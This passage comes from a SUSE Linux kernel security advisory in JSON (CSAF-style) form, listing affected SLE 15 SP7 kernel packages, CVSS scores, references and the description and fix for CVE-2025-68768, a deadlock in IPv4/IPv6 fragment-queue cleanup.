"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
